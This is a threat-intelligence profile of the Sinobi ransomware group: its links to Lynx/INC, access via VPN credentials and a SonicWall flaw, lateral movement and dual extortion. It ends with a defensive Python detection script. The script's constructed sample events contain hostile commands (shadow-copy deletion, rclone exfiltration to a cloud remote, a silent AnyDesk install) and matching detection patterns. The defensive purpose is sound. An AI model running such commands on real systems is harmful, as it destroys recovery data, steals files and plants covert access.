The Sinobi ransomware group first emerged in late June 2025, with a sharp rise in activity in July 2025 that continued steadily through the rest of the year. The group employs dual extortion (data theft plus encryption) in its attacks, doubling the pressure on victim organizations to pay.
Due to similarities in code, TTPs, and data leak sites (DLS), Sinobi is widely believed to be an offshoot or rebrand of the Lynx and INC ransomware groups. It is equally possible that the Sinobi operators purchased the INC Ransom source code that was listed for sale in May 2024 for $300,000 USD. All three groups remain active into 2026; it is not known whether the operations are run in tandem or are separate operations built on shared source code.
The group operates under a semi-private Ransomware-as-a-Service (RaaS) model and uses dual extortion to maximize the likelihood of payment. It appears to work only with known, vetted affiliates, who conduct the intrusions themselves in exchange for a share of the profits. Because the group does not work with individuals it does not already know, public information about it and its operations is limited. That selectivity also improves its operational security, which points to well-connected and experienced operators.
Several reports describe significant overlaps between Sinobi and the Lynx/INC ransomware variants. The Tor-based data leak sites of all three groups are also very similar in appearance, reinforcing the link between them. Clear web mirrors of the leak sites exist as well.
According to public reporting, the group gains initial access by compromising or exploiting internet-facing edge devices and software.
In one case, eSentire reported the group gaining access through a public-facing SSL VPN using compromised valid credentials; the account belonged to an MSP and mapped to a Domain Admin account in the victim environment.
Beyond valid-credential abuse, the group has also been known to exploit vulnerable SonicWall VPN appliances. Surefire has linked SonicWall compromises to a specific vulnerability, CVE-2024-53704, an improper-authentication flaw in the SonicOS SSLVPN service that allows an unauthenticated remote attacker to bypass authentication and hijack active VPN sessions. SonicWall released fixed firmware in January 2025; any SSL VPN appliance still running an affected version should be treated as exposed, and because the flaw permits session hijacking, existing VPN sessions should be terminated and credentials reviewed after patching.
Like many other groups, Sinobi relies primarily on RDP and mounted network shares for lateral movement, operating under the context of either compromised accounts or accounts the group itself created. These valid and newly created accounts are used to move throughout the victim environment and, ultimately, to deploy the ransomware rapidly.
The group has also been observed enumerating USB devices, which may indicate some ability to propagate via infected removable media.
The group has been observed deploying RMM tools (AnyDesk) to maintain persistent access to a host. It has also been observed elevating the permissions of existing users and creating new domain administrator accounts, which serves as both persistence and privilege escalation.
Sinobi has been observed attempting to uninstall security software and deleting Volume Shadow Copies on targets in order to impede recovery.
The group employs dual extortion to increase the pressure on victims to pay: it steals data before encrypting the environment. Rclone and WinSCP have been observed exfiltrating data to cloud storage.
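As an added illustration of how the post-compromise behaviours described above (newly created domain administrators, shadow copy deletion, RMM installation, and Rclone/WinSCP exfiltration) can be caught in telemetry, the following Python example, which is not from the original report or from any vendor mentioned in it, runs simple detection rules over constructed Windows Security (4720/4728) and Sysmon process-creation style events. All hostnames, account names, timestamps and command lines are made up for the example; the command-line strings mimic the real tools' syntax but are not captured from an intrusion.

```python
"""Detection rules for the Sinobi post-compromise TTPs, run over constructed sample events."""
import re
from datetime import datetime, timedelta

# Constructed sample events (not real telemetry). Security IDs 4720 (user created)
# and 4728 (member added to global group); id 1 stands in for Sysmon process creation.
SAMPLE_EVENTS = [
    {"ts": "2025-07-14T02:11:05", "host": "DC01", "id": 4720,
     "subject": "CORP\\msp-svc", "target": "CORP\\svc_backup2"},
    {"ts": "2025-07-14T02:11:40", "host": "DC01", "id": 4728,
     "subject": "CORP\\msp-svc", "target": "CORP\\svc_backup2", "group": "Domain Admins"},
    {"ts": "2025-07-14T02:20:13", "host": "FS01", "id": 1, "user": "CORP\\svc_backup2",
     "image": "C:\\Windows\\System32\\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2025-07-14T02:35:00", "host": "FS01", "id": 1, "user": "CORP\\svc_backup2",
     "image": "C:\\Temp\\rclone.exe",
     "cmdline": "rclone.exe copy E:\\Finance mega:exfil --transfers 16"},
    {"ts": "2025-07-14T02:36:00", "host": "WS07", "id": 1, "user": "CORP\\jdoe",
     "image": "C:\\Program Files\\AnyDesk\\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --install C:\\Program Files\\AnyDesk --start-with-win --silent"},
    # Benign control: an existing account added to a non-privileged group.
    {"ts": "2025-07-14T09:00:00", "host": "DC01", "id": 4728,
     "subject": "CORP\\helpdesk", "target": "CORP\\jsmith", "group": "VPN Users"},
]

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
SHADOW_DELETE = re.compile(
    r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete|Win32_ShadowCopy",
    re.IGNORECASE)
EXFIL_TOOLS = re.compile(r"\b(rclone|winscp)(\.exe)?\b", re.IGNORECASE)
RMM_INSTALL = re.compile(r"anydesk(\.exe)?\b.*--install", re.IGNORECASE)


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def detect_new_privileged_admin(events, window=timedelta(hours=1)):
    """Flag an account that is created (4720) and then added to a privileged
    group (4728) within `window`: the 'create a new domain admin' step."""
    created = {e["target"]: _ts(e) for e in events if e["id"] == 4720}
    hits = []
    for e in events:
        if e["id"] != 4728 or e.get("group") not in PRIVILEGED_GROUPS:
            continue
        born = created.get(e["target"])
        if born is not None and timedelta(0) <= _ts(e) - born <= window:
            hits.append(("new_privileged_admin", e["target"]))
    return hits


def detect_process_activity(events):
    """Flag shadow copy deletion, exfiltration tooling and RMM installs
    from process-creation events (image path and command line)."""
    hits = []
    for e in events:
        if e["id"] != 1:
            continue
        cmd = e["cmdline"]
        if SHADOW_DELETE.search(cmd):
            hits.append(("shadow_copy_deletion", e["host"]))
        if EXFIL_TOOLS.search(e["image"]) or EXFIL_TOOLS.search(cmd):
            hits.append(("exfil_tool", e["host"]))
        if RMM_INSTALL.search(cmd):
            hits.append(("rmm_install", e["host"]))
    return hits


def run_detections(events):
    """Return every (rule, subject) pair fired across the event stream."""
    return detect_new_privileged_admin(events) + detect_process_activity(events)


if __name__ == "__main__":
    for rule, subject in run_detections(SAMPLE_EVENTS):
        print(f"{rule}: {subject}")
```

The account-creation rule is the one worth tuning in practice: correlating 4720 with a later 4728 into a privileged group within a short window cuts out routine group changes (the "VPN Users" control event above fires nothing), while the process rules are simple string matches that a real deployment would pair with allow-lists for hosts where Rclone or AnyDesk are legitimately used.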
Once data has been exfiltrated, the Sinobi ransomware is deployed and the environment is encrypted. Binary analysis shows heavy overlap between Sinobi samples and INC/Lynx samples.
According to Halcyon, the group primarily targets organizations with annual revenue of $10-50 million, large enough to guarantee a worthwhile payout for the effort. In 2025, its top vertical was Manufacturing, with Construction & Engineering, Healthcare, and Professional & Commercial Services close behind.
Sinobi claimed 176 attacks between its first known attack on June 7, 2025 and the end of 2025. Victims span 19 countries, with the vast majority located in the United States.